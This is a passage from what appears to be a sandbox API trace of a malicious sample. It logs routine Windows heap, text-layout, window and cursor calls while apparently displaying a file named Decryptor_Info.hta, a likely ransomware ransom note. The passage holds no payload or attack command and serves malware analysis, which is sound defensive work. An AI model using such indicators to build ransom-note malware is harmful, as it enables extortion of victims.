hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.624] LsQueryLineDup () returned 0x0 [0113.624] LsDestroyLine () returned 0x0 [0113.624] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.624] LsSetDoc () returned 0x0 [0113.624] LsCreateLine () returned 0x0 [0113.624] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.625] LsQueryLineDup () returned 0x0 [0113.625] LsDestroyLine () returned 0x0 [0113.625] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.625] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab9a8 [0113.625] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4cc310, Size=0x144) returned 0x4cc310 [0113.625] LsSetDoc () returned 0x0 [0113.625] LsCreateLine () returned 0x0 [0113.625] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.626] LsQueryLineDup () returned 0x0 [0113.626] LsDestroyLine () returned 0x0 [0113.626] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.626] LsSetDoc () returned 0x0 [0113.626] LsCreateLine () returned 0x0 [0113.626] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.627] LsQueryLineDup () returned 0x0 [0113.627] LsDestroyLine () returned 0x0 [0113.627] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.627] LsSetDoc () returned 0x0 [0113.627] LsCreateLine () returned 0x0 [0113.627] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.628] LsQueryLineDup () returned 0x0 [0113.628] LsDestroyLine () returned 0x0 [0113.628] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.628] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4cc310, Size=0x1d4) returned 0x4cc310 [0113.628] LsSetDoc () returned 0x0 [0113.628] LsCreateLine () returned 0x0 [0113.628] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.629] LsQueryLineDup () returned 0x0 [0113.629] LsDestroyLine () returned 0x0 [0113.629] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.629] LsSetDoc () returned 0x0 [0113.629] LsCreateLine () returned 0x0 [0113.629] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.630] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c7580, Size=0x12c) returned 0x4cc4f0 [0113.630] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c7a80, Size=0x12c) returned 0x4cc628 [0113.630] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c7650, Size=0x258) returned 0x4cc760 [0113.630] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c7b50, Size=0x258) returned 0x4c7580 [0113.630] LsQueryLineDup () returned 0x0 [0113.630] LsDestroyLine () returned 0x0 [0113.630] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.631] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4aba38 [0113.631] LsSetDoc () returned 0x0 [0113.631] LsCreateLine () returned 0x0 [0113.631] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.631] LsQueryLineDup () returned 0x0 [0113.632] LsDestroyLine () returned 0x0 [0113.632] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.632] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c8440 | out: hHeap=0x450000) returned 1 [0113.632] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.632] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.632] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.632] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.632] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.632] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.632] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.632] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.632] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.633] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.633] IntersectRect (in: lprcDst=0x22f214, lprcSrc1=0x22f214, lprcSrc2=0x22f1e4 | out: lprcDst=0x22f214) returned 1 [0113.633] IntersectRect (in: lprcDst=0x4a1d18, lprcSrc1=0x4a1d18, lprcSrc2=0x22f204 | out: lprcDst=0x4a1d18) returned 1 [0113.633] IntersectRect (in: lprcDst=0x4a1d18, lprcSrc1=0x4a1d18, lprcSrc2=0x22f224 | out: lprcDst=0x4a1d18) returned 1 [0113.633] IntersectRect (in: lprcDst=0x22eed4, lprcSrc1=0x22eed4, lprcSrc2=0x22eea4 | out: lprcDst=0x22eed4) returned 1 [0113.633] IntersectRect (in: lprcDst=0x4a1d18, lprcSrc1=0x4a1d18, lprcSrc2=0x22eec4 | out: lprcDst=0x4a1d18) returned 1 [0113.633] IntersectRect (in: lprcDst=0x4a1d18, lprcSrc1=0x4a1d18, lprcSrc2=0x22eee4 | out: lprcDst=0x4a1d18) returned 1 [0113.633] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.633] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.633] IntersectRect (in: lprcDst=0x22ede8, lprcSrc1=0x22ede8, lprcSrc2=0x4a1d08 | out: lprcDst=0x22ede8) returned 1 [0113.633] UnionRect (in: lprcDst=0x22f0f0, lprcSrc1=0x22f0f0, lprcSrc2=0x22f09c | out: lprcDst=0x22f0f0) returned 1 [0113.633] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.633] UnionRect (in: lprcDst=0x22f430, lprcSrc1=0x22f430, lprcSrc2=0x22f3dc | out: lprcDst=0x22f430) returned 1 [0113.633] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x4c02b0 [0113.633] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02b0 | out: hHeap=0x450000) returned 1 [0113.633] RedrawWindow (hWnd=0x201f2, lprcUpdate=0x22f4b0, hrgnUpdate=0x0, flags=0x21) returned 1 [0113.634] GetFocus () returned 0x201f2 [0113.634] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x4a7160 [0113.634] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x4a7170 [0113.634] GetFocus () returned 0x201f2 [0113.634] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f158 | out: lpPoint=0x22f158) returned 1 [0113.635] GetCapture () returned 0x0 [0113.635] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x4c02b0 [0113.635] GetCurrentThreadId () returned 0xe9c [0113.635] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aaf40 | out: hHeap=0x450000) returned 1 [0113.635] GetCurrentThreadId () returned 0xe9c [0113.635] GetCurrentThreadId () returned 0xe9c [0113.635] GetFocus () returned 0x201f2 [0113.635] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f158 | out: lpPoint=0x22f158) returned 1 [0113.636] GetCurrentThreadId () returned 0xe9c [0113.636] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aaf40 | out: hHeap=0x450000) returned 1 [0113.636] GetCurrentThreadId () returned 0xe9c [0113.636] GetCurrentThreadId () returned 0xe9c [0113.637] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f158 | out: lpPoint=0x22f158) returned 1 [0113.637] GetCapture () returned 0x0 [0113.637] GetCurrentThreadId () returned 0xe9c [0113.637] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aaf40 | out: hHeap=0x450000) returned 1 [0113.637] GetCurrentThreadId () returned 0xe9c [0113.637] GetCurrentThreadId () returned 0xe9c [0113.637] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f158 | out: lpPoint=0x22f158) returned 1 [0113.638] GetCapture () returned 0x0 [0113.638] GetCurrentThreadId () returned 0xe9c [0113.638] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aaf40 | out: hHeap=0x450000) returned 1 [0113.638] GetCurrentThreadId () returned 0xe9c [0113.638] GetCurrentThreadId () returned 0xe9c [0113.638] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f158 | out: lpPoint=0x22f158) returned 1 [0113.639] GetCurrentThreadId () returned 0xe9c [0113.639] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aaf40 | out: hHeap=0x450000) returned 1 [0113.639] GetCurrentThreadId () returned 0xe9c [0113.639] GetCurrentThreadId () returned 0xe9c [0113.639] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f158 | out: lpPoint=0x22f158) returned 1 [0113.640] GetCurrentThreadId () returned 0xe9c [0113.640] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aaf40 | out: hHeap=0x450000) returned 1 [0113.640] GetCurrentThreadId () returned 0xe9c [0113.640] GetCurrentThreadId () returned 0xe9c [0113.640] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02e0 | out: hHeap=0x450000) returned 1 [0113.640] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a7160 | out: hHeap=0x450000) returned 1 [0113.640] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02b0 | out: hHeap=0x450000) returned 1 [0113.640] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a7170 | out: hHeap=0x450000) returned 1 [0113.640] GetCurrentThreadId () returned 0xe9c [0113.640] GetFocus () returned 0x201f2 [0113.640] GetFocus () returned 0x201f2 [0113.641] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4896a8, Size=0x5b2) returned 0x4896a8 [0113.641] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.641] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47cc78 | out: hHeap=0x450000) returned 1 [0113.641] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c80d0 | out: hHeap=0x450000) returned 1 [0113.641] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4a2290, Size=0x150) returned 0x4c7a80 [0113.641] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x492cd8 | out: hHeap=0x450000) returned 1 [0113.642] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a1e80 | out: hHeap=0x450000) returned 1 [0113.642] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x498b40 | out: hHeap=0x450000) returned 1 [0113.642] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x493830 | out: hHeap=0x450000) returned 1 [0113.642] IUnknown:Release (This=0x47c264) returned 0xe [0113.642] IUnknown:Release (This=0x488270) returned 0x3 [0113.642] IUnknown:Release (This=0x47c264) returned 0xd [0113.642] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a0b50 | out: hHeap=0x450000) returned 1 [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x498990 | out: hHeap=0x450000) returned 1 [0113.643] IUnknown:Release (This=0x47c264) returned 0xc [0113.643] IUnknown:Release (This=0x488270) returned 0x2 [0113.643] IUnknown:Release (This=0x47c264) returned 0xb [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x495e50 | out: hHeap=0x450000) returned 1 [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x494670 | out: hHeap=0x450000) returned 1 [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.643] IUnknown:Release (This=0x47c264) returned 0xa [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.643] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.644] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.644] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.644] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.644] IUnknown:Release (This=0x47c264) returned 0x9 [0113.644] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.644] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.644] IUnknown:Release (This=0x47c264) returned 0x8 [0113.644] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.644] IUnknown:Release (This=0x493b50) returned 0x1 [0113.644] IUnknown:Release (This=0x493b50) returned 0x0 [0113.644] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x492f10 | out: hHeap=0x450000) returned 1 [0113.644] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.644] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.644] IUnknown:Release (This=0x47c264) returned 0x5 [0113.644] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x493600 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x493448 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x492d40 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bf5e8 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x496e60 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4932c8 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bd218 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x493338 | out: hHeap=0x450000) returned 1 [0113.645] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4904f0 | out: hHeap=0x450000) returned 1 [0113.645] GetCurrentThreadId () returned 0xe9c [0113.646] GetCurrentThreadId () returned 0xe9c [0113.646] GetCurrentThreadId () returned 0xe9c [0113.646] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f3e0 | out: lpPoint=0x22f3e0) returned 1 [0113.646] GetCurrentThreadId () returned 0xe9c [0113.646] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.646] GetCurrentThreadId () returned 0xe9c [0113.646] GetCurrentThreadId () returned 0xe9c [0113.647] GetFocus () returned 0x201f2 [0113.647] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x492f10 [0113.647] NotifyWinEvent (event=0x8005, hwnd=0x201f2, idObject=1, idChild=0) [0113.647] GetCurrentThreadId () returned 0xe9c [0113.647] LoadStringW (in: hInstance=0x73150000, uID=0x1fe9, lpBuffer=0x22f118, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0113.647] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x494820 | out: hHeap=0x450000) returned 1 [0113.647] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bcd80 | out: hHeap=0x450000) returned 1 [0113.647] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22ee88 | out: lpPoint=0x22ee88) returned 1 [0113.647] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x46d8c0 [0113.648] GetCurrentThreadId () returned 0xe9c [0113.648] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.648] GetCurrentThreadId () returned 0xe9c [0113.648] GetFocus () returned 0x201f2 [0113.648] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.648] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22eeb8 | out: lpPoint=0x22eeb8) returned 1 [0113.649] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x46d8c0 [0113.649] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.649] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22eea0 | out: lpPoint=0x22eea0) returned 1 [0113.649] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x46d8c0 [0113.650] GetCurrentThreadId () returned 0xe9c [0113.650] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.650] GetCurrentThreadId () returned 0xe9c [0113.650] IsWinEventHookInstalled (event=0x8005) returned 0 [0113.650] StrCmpICW (pszStr1="about:blank", pszStr2="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta") returned -5 [0113.650] StrCmpICW (pszStr1="about:blank", pszStr2="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta") returned -5 [0113.650] GetCurrentThreadId () returned 0xe9c [0113.650] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f3a0 | out: lpPoint=0x22f3a0) returned 1 [0113.651] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x46d8c0 [0113.651] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.651] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f380 | out: lpPoint=0x22f380) returned 1 [0113.651] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x46d8c0 [0113.651] GetCurrentThreadId () returned 0xe9c [0113.651] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.652] GetCurrentThreadId () returned 0xe9c [0113.652] IsWinEventHookInstalled (event=0x8005) returned 0 [0113.652] GetCurrentThreadId () returned 0xe9c [0113.652] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0113.652] NtdllDefWindowProc_W () returned 0x0 [0113.652] NtdllDefWindowProc_W () returned 0x10027 [0113.652] NtdllDefWindowProc_W () returned 0x10027 [0113.653] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0113.653] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0113.653] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0113.653] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0113.653] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0113.653] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.655] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f460 | out: lpPoint=0x22f460) returned 1 [0113.656] GetMessageTime () returned 161695 [0113.656] GetMessagePos () returned 0x1270350 [0113.656] GetCapture () returned 0x0 [0113.656] IntersectRect (in: lprcDst=0x22ee50, lprcSrc1=0x22ee50, lprcSrc2=0x22eee0 | out: lprcDst=0x22ee50) returned 1 [0113.656] IntersectRect (in: lprcDst=0x22ec0c, lprcSrc1=0x22ec0c, lprcSrc2=0x22ebdc | out: lprcDst=0x22ec0c) returned 1 [0113.656] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22ebfc | out: lprcDst=0x22eef0) returned 1 [0113.656] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.656] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c02b0 [0113.656] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22ec1c | out: lprcDst=0x22eef0) returned 1 [0113.656] IntersectRect (in: lprcDst=0x22e9e0, lprcSrc1=0x22e9e0, lprcSrc2=0x22eee0 | out: lprcDst=0x22e9e0) returned 1 [0113.656] IntersectRect (in: lprcDst=0x22e9e0, lprcSrc1=0x22e9e0, lprcSrc2=0x22eee0 | out: lprcDst=0x22e9e0) returned 1 [0113.656] IntersectRect (in: lprcDst=0x22e79c, lprcSrc1=0x22e79c, lprcSrc2=0x22e76c | out: lprcDst=0x22e79c) returned 1 [0113.656] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22e78c | out: lprcDst=0x22eef0) returned 1 [0113.656] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.656] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c02e0 [0113.657] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22e7ac | out: lprcDst=0x22eef0) returned 1 [0113.657] IntersectRect (in: lprcDst=0x22e570, lprcSrc1=0x22e570, lprcSrc2=0x22eee0 | out: lprcDst=0x22e570) returned 1 [0113.660] IntersectRect (in: lprcDst=0x22e630, lprcSrc1=0x22e630, lprcSrc2=0x22eee0 | out: lprcDst=0x22e630) returned 1 [0113.660] IntersectRect (in: lprcDst=0x22e630, lprcSrc1=0x22e630, lprcSrc2=0x22eee0 | out: lprcDst=0x22e630) returned 1 [0113.660] IntersectRect (in: lprcDst=0x22e630, lprcSrc1=0x22e630, lprcSrc2=0x22eee0 | out: lprcDst=0x22e630) returned 1 [0113.660] IntersectRect (in: lprcDst=0x22e630, lprcSrc1=0x22e630, lprcSrc2=0x22eee0 | out: lprcDst=0x22e630) returned 1 [0113.663] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02e0 | out: hHeap=0x450000) returned 1 [0113.663] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02b0 | out: hHeap=0x450000) returned 1 [0113.663] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.665] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4aba80 [0113.665] SetTimer (hWnd=0x30204, nIDEvent=0x2000, uElapse=0x12c, lpTimerFunc=0x0) returned 0x2000 [0113.665] PtInRect (lprc=0x22f1b8, pt=0x1e5) returned 1 [0113.666] PtInRect (lprc=0x22f05c, pt=0xbda6) returned 1 [0113.667] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0113.667] GetCursor () returned 0x10007 [0113.667] ShowCursor (bShow=0) returned -1 [0113.668] SetCursor (hCursor=0x10003) returned 0x10007 [0113.668] ShowCursor (bShow=1) returned 0 [0113.668] GetCurrentThreadId () returned 0xe9c [0113.668] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0113.668] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.668] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f358 | out: lpRect=0x22f358) returned 1 [0113.668] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f368 | out: lpPoint=0x22f368) returned 1 [0113.668] PtInRect (lprc=0x22f358, pt=0x1e5) returned 1 [0113.668] GetCurrentThreadId () returned 0xe9c [0113.668] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.668] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f3d8 | out: lpPoint=0x22f3d8) returned 1 [0113.669] GetMessageTime () returned 161695 [0113.669] GetMessagePos () returned 0x1270350 [0113.669] GetCapture () returned 0x0 [0113.669] IntersectRect (in: lprcDst=0x22edc8, lprcSrc1=0x22edc8, lprcSrc2=0x22ee58 | out: lprcDst=0x22edc8) returned 1 [0113.669] IntersectRect (in: lprcDst=0x22eb84, lprcSrc1=0x22eb84, lprcSrc2=0x22eb54 | out: lprcDst=0x22eb84) returned 1 [0113.669] IntersectRect (in: lprcDst=0x22ee68, lprcSrc1=0x22ee68, lprcSrc2=0x22eb74 | out: lprcDst=0x22ee68) returned 1 [0113.669] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.669] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c02b0 [0113.669] IntersectRect (in: lprcDst=0x22ee68, lprcSrc1=0x22ee68, lprcSrc2=0x22eb94 | out: lprcDst=0x22ee68) returned 1 [0113.669] IntersectRect (in: lprcDst=0x22e958, lprcSrc1=0x22e958, lprcSrc2=0x22ee58 | out: lprcDst=0x22e958) returned 1 [0113.669] IntersectRect (in: lprcDst=0x22e958, lprcSrc1=0x22e958, lprcSrc2=0x22ee58 | out: lprcDst=0x22e958) returned 1 [0113.669] IntersectRect (in: lprcDst=0x22e714, lprcSrc1=0x22e714, lprcSrc2=0x22e6e4 | out: lprcDst=0x22e714) returned 1 [0113.669] IntersectRect (in: lprcDst=0x22ee68, lprcSrc1=0x22ee68, lprcSrc2=0x22e704 | out: lprcDst=0x22ee68) returned 1 [0113.669] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.669] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c02e0 [0113.669] IntersectRect (in: lprcDst=0x22ee68, lprcSrc1=0x22ee68, lprcSrc2=0x22e724 | out: lprcDst=0x22ee68) returned 1 [0113.669] IntersectRect (in: lprcDst=0x22e4e8, lprcSrc1=0x22e4e8, lprcSrc2=0x22ee58 | out: lprcDst=0x22e4e8) returned 1 [0113.669] IntersectRect (in: lprcDst=0x22e5a8, lprcSrc1=0x22e5a8, lprcSrc2=0x22ee58 | 